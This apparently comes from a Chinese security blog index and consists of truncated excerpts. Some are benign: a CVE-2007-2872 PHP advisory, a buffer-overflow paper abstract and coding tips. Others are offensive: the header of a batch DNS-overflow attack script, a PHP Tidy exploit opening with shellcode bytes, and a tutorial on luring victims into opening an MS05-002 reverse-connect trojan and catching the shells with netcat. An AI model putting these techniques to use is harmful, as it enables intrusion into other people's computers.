C:\>netstat -na|find "36897"TCP 127.0.0.1:36897 0.0.0.0:0 LISTENING绑定的本地IP啊？！那就说明这个是不可以远程的，只能本地了。......23132CBE 68 B4C61323 push 2313C6B4 ; ASCII "savepath"23132CC3 57 push edi23132CC4 FFD6 call esi23132CC6&...

[code]@shift 1 @ setlocal @ cls @ color A @ title DNS批量溢出个人版 @echo ================================================================================ @echo DNS批量溢出个人版 @echo BY Amxking @echo 1.输入您想溢出的IP段...

来一个简单的例子。有兴趣的朋友可以自己尝试[code]function a(){   document.title = "ok";   setTimeout(a,0); }   setTimeout(a,0); [/code]...

第一种：一、检测它是不是整数 [code]function Is_Int(a_str)     if not isnumeric(a_str) or len(str) > 5 then        Is_Int = false         exit ...

使用Excel作数据库进行查询并显示字段值时老是提示错误：[Microsoft][ODBCExcelDriver]数值字段溢出！最终在Microsoft网站上查得知是由于一些字段中的数据类型不一致造成的。才想起来Excel中原有的身份证字段是文本类型，后来手工添加的几条记录都被自动转成了数值型，统一成文本后问题随之解决。Microsoft详细说明：http://support.microsoft.com/kb/815277/zh-cn...

[code]<?php if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");} $scode = "\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85". "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1". "\x8c\xff\x26...

受影响系统：PHPPHP<5.2.3不受影响系统：PHPPHP5.2.3描述：--------------------------------------------------------------------------------BUGTRAQID:24261CVE(CAN)ID:CVE-2007-2872PHP是一种流行的WEB服务器端编程语言。PHP中的chunk_split函数在处理畸形参数时存在整数溢出漏洞，本地攻击者可能利用此漏洞提升自己的权限。PHP中chunk_split函数的1963行试图为函数结果分配充分的内存大小，但没有执行任何检查便使用了srclen和chu...

       有这样一种视频，它极其诱人，你无法抗拒它的诱惑，点击。在一阵等待之后，你会觉察到刚才看到的只是“海市蜃楼”，此时，你已身处深不见底的“瓮”中。 　　RealPlayer是大家常用的媒体播放器，用户非常多，因此它一旦出现漏洞，必定会有很多人遭到攻击。以前RealPlayer Server就曾爆出过一个远程溢出漏洞，使得许多影视网站遭到攻击。如今，当大家已淡忘上次的漏洞灾害所带来的痛苦时，新版RealPlayer中又出现了溢出漏洞。 　　现在，众多“黑客”已蠢蠢欲动，期待利用RealP...

在windows系统中，同样存在着缓存溢出的问题。而且，随着internet的普及，win系列平台上的internet服务程序越来越多，低水平的win程序就成为你系统上的致命伤，因为它们同样会发生远程堆栈溢出。而且，由于win系统使用者和管理者普遍缺乏安全防范意识，一台win系统上的堆栈溢出，如果被恶意利用，将导致整个机器被黑客所控制，进而可能导致整个局域网落入黑客之手。在微软的产品iis server4.0中就被发现存在一种被称为“非法htr请求”的缺陷。据微软称，此缺陷在特定情况下会导致任意代码都可以在服务器端运行。黑客可以利用这一漏洞对iis服务器进行完全的控制，而实际上许多电...

摘要： 在过去的十年中，以缓冲区溢出为类型的安全漏洞占是最为 常见的一种形式了。更为严重的是，缓冲区溢出漏洞占了远程网 络攻击的绝大多数，这种攻击可以使得一个匿名的Internet用户 有机会获得一台主机的部分或全部的控制权！如果能有效地消除 缓冲区溢出的漏洞，则很大一部分的安全威胁可以得到缓解。在 本文中，我们研究了各种类型的缓冲区溢出漏洞和攻击手段，同 时我们也研究了各种的防御手段，这些手段用来消除这些漏洞所 造成的影响，其中包括我们自己的堆栈保护方法。然后我们要考 虑如何在保证现有系统功能和性能不变...

溢出攻击永远是安全界中，不可忽视的角色。而如今也正是肉鸡短缺的年代，能掌握一门最新的Ms05002溢出，必定会让你有“惊人”的收获。至于熟练的溢出如何炼成?具体方法请见下文所示!　　实施方法：通过Ms05002攻击工具，溢出反弹IP、反弹端口，会生成含有木马性质的文件。然后将这个产生的文件，以QQ传输的形式发给受害者观看，或者将其上传到自己的主页空间，引诱其他人访问。最后执行NC瑞士军刀，监听本机端口，收取已经运行产生文件的主机。　　步骤1．首先从网上下载Ms05002溢出工具，释放到比较理想的硬盘驱动器中，然后在CMD命令行下，输入软件名称启动该程序，会出现一些英文形式的帮助信息(如图1)。...